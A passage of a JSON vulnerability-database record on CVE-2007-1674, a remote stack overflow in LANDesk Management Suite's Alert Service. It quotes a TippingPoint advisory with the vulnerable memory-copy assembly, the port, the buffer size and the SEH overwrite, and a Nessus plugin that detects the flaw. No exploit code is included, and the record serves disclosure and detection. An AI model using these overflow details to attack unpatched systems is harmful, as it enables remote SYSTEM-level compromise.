"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16457/"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "cvelist": ["CVE-2007-1674"], "description": "UDP/65535 alert service bufer overflow.", "edition": 1, "modified": "2007-04-14T00:00:00", "published": "2007-04-14T00:00:00", "id": "SECURITYVULNS:VULN:7581", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7581", "title": "LANDesk Management Suite buffer overflow", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:21", "bulletinFamily": "software", "cvelist": ["CVE-2007-1674"], "description": "TSRT-07-04: LANDesk Management Suite Alert Service Stack Overflow\r\n Vulnerability\r\nhttp://www.tippingpoint.com/security/advisories/TSRT-07-04.html\r\nApril 13, 2007\r\n\r\n-- CVE ID:\r\nCVE-2007-1674\r\n\r\n-- Affected Vendor:\r\nLANDesk\r\n\r\n-- Affected Products:\r\nManagement Suite 8.7\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability since March 23, 2007 by Digital Vaccine protection\r\nfilter ID 5210. For further product information on the TippingPoint IPS:\r\n\r\n http://www.tippingpoint.com \r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows attackers to execute arbitrary code on\r\nvulnerable installations of LANDesk Management Suite. User interaction\r\nis not required to exploit this vulnerability.\r\n\r\nThe specific flaw exists in the Alert Service listening on UDP port\r\n65535. The Aolnsrvr.exe process accepts user-supplied data and performs\r\nan inline memory copy into a 268 byte stack-based buffer. Supplying\r\nadditional data results in a buffer overflow and SEH overwrite. The\r\nvulnerable memory copy is shown here:\r\n\r\n 0041EF49 mov edi, eax ; edi pointer to stack buffer\r\n 0041EF4B mov eax, ecx\r\n 0041EF4D shr ecx, 2 ; total size of data\r\n 0041EF50 rep movsd\r\n 0041EF52 mov ecx, eax\r\n 0041EF54 mov eax, ebx\r\n 0041EF56 and ecx, 3\r\n 0041EF59 rep movsb\r\n\r\nExploitation allows an attacker to execute arbitrary code under the\r\ncontext of the SYSTEM user.\r\n\r\n-- Vendor Response:\r\nLANDesk has issued an update to correct this vulnerability. More details\r\ncan be found at:\r\n\r\nhttp://kb.landesk.com/display/4n/kb/article.asp?aid=4142\r\n\r\n-- Disclosure Timeline:\r\n2007.03.08 - Vulnerability reported to vendor\r\n2007.03.23 - Digital Vaccine released to TippingPoint customers\r\n2007.04.13 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by Aaron Portnoy, TippingPoint\r\nSecurity Research Team.\r\n", "edition": 1, "modified": "2007-04-14T00:00:00", "published": "2007-04-14T00:00:00", "id": "SECURITYVULNS:DOC:16707", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:16707", "title": "TSRT-07-04: LANDesk Management Suite Alert Service Stack Overflow Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-04-01T03:35:00", "description": "LANDesk Management Suite, used to automate system and security\nmanagement tasks, is installed on the remote host.\n\nThe version of LANDesk Management Suite includes an instance of Intel\nPro Alerting Proxy, which contains a stack-based buffer overflow\nvulnerability. An attacker may be able to leverage this issue by\nconnecting to it over UDP port 65535 and sending sufficient data to\noverflow a 268 byte stack-based buffer to execute arbitrary code with\nLOCAL SYSTEM privileges.", "edition": 27, "published": "2007-04-24T00:00:00", "title": "LANDesk Management Suite Alert Service (aolnsrvr.exe) Remote Overflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1674"], "modified": "2021-04-02T00:00:00", "cpe": [], "id": "LANDESK_AOLNSRVR_OVERFLOW.NASL", "href": "https://www.tenable.com/plugins/nessus/25085", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25085);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/11/15 20:50:27\");\n\n script_cve_id(\"CVE-2007-1674\");\n script_bugtraq_id(23483);\n\n script_name(english:\"LANDesk Management Suite Alert Service (aolnsrvr.exe) Remote Overflow\");\n script_summary(english:\"Checks for Intel Pro Alerting Proxy\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an application that is affected by a\nbuffer overflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"LANDesk Management Suite, used to automate system and security\nmanagement tasks, is installed on the remote host.\n\nThe version of LANDesk Management Suite includes an instance of Intel\nPro Alerting Proxy, which contains a stack-based buffer overflow\nvulnerability. An attacker may be able to leverage this issue by\nconnecting to it over UDP port 65535 and sending sufficient data to\noverflow a 268 byte stack-based buffer to execute arbitrary code with\nLOCAL SYSTEM privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.tippingpoint.com/security/advisories/TSRT-07-04.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/bugtraq/2007/Apr/211\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the latest Service Pack followed by hotfix INST-11050687.2.zip\nor remove the Intel Pro Alerting Proxy software.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'LANDesk Management Suite 8.7 Alert Service Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/04/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/04/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/04/24\");\n\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\nscript_end_attributes();\n\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"smb_func.inc\");\ninclude(\"audit.inc\");\n\n\n# Connect to the appropriate share.\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0);\n\nname = kb_smb_name();\nport = kb_smb_transport();\n\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\n\n\nif(! smb_session_init()) audit(AUDIT_FN_FAIL, 'smb_session_init');\nrc = NetUseAdd(login:login, password:pass, domain:domain, share:\"IPC$\");\nif (rc != 1)\n{\n NetUseDel();\n exit(0);\n}\n\n\n# Connect to remote registry.\nhklm = RegConnectRegistry(hkey:HKEY_LOCAL_MACHINE);\nif (isnull(hklm))\n{\n NetUseDel();\n exit(0);\n}\n\n\n# Get some info about the install.\nlandesk = NULL;\npath = NULL;\n\nkey = \"SOFTWARE\\LANDesk\\ManagementSuite\\Setup\";\nkey_h = RegOpenKey(handle:hklm, key:key, mode:MAXIMUM_ALLOWED);\nif (!isnull(key_h))\n{\n # If LANDesk is installed...\n item = RegQueryValue(handle:key_h, item:\"LdmainPath\");\n if (!isnull(item))\n {\n # Figure out where Alerting Proxy is installed.\n key2 = \"SOFTWARE\\INTEL\\Alert on LAN\\Proxy\";\n key2_h = RegOpenKey(handle:hklm, key:key2, mode:MAXIMUM_ALLOWED);\n if (!isnull(key2_h))\n {\n item = RegQueryValue(handle:key2_h, item:\"ImagePath\");\n if (!isnull(item))\n {\n path = item[1];\n path = ereg_replace(pattern:\"^(.+)\\\\$\", replace:\"\\1\", string:path);\n }\n RegCloseKey(handle:key2_h);\n }\n }\n RegCloseKey(handle:key_h);\n}\nRegCloseKey(handle:hklm);\n\n\n# If it is...\nif (path)\n{\n # Make sure the executable exists.\n share = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:path);\n exe = ereg_replace(pattern:\"^[A-Za-z]:(.*)\", replace:\"\\1\\Aolnsrvr.exe\", string:path);\n NetUseDel(close:FALSE);\n\n rc = NetUseAdd(login:login, password:pass, domain:domain, share:share);\n if (rc != 1)\n {\n NetUseDel();\n exit(0);\n }\n\n fh = CreateFile(\n file:exe,\n desired_access:GENERIC_READ,\n file_attributes:FILE_ATTRIBUTE_NORMAL,\n share_mode:FILE_SHARE_READ,\n create_disposition:OPEN_EXISTING\n );\n if (!isnull(fh))\n {\n CloseFile(handle:fh);\n\n # nb: the patch removes the affected software.\n report = string(\n \"The LANDesk Management Suite Alert Service is installed under :\\n\",\n \"\\n\",\n \" \", path, \"\\n\"\n );\n security_hole(port:port, extra:report);\n }\n}\n\n\n# Clean up.\nNetUseDel();\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
